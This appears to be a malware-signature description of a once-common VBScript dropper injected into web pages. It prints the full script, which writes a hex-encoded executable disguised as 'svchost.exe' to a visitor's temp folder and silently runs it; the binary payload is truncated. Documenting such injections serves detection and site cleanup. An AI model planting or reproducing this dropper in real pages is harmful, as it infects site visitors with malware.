Description:
Malicious VBScript that drops a malicious file to a site visitor's computer and [optionally] executes it.
Such attacks work only in old versions of Internet Explorer. Most modern browsers don't support VBScript by default.
Here's a sample of what used to be one of the most popular VB dropper injection
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004...skipped...000000000000000"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>
Affecting: Any web site (no specific target).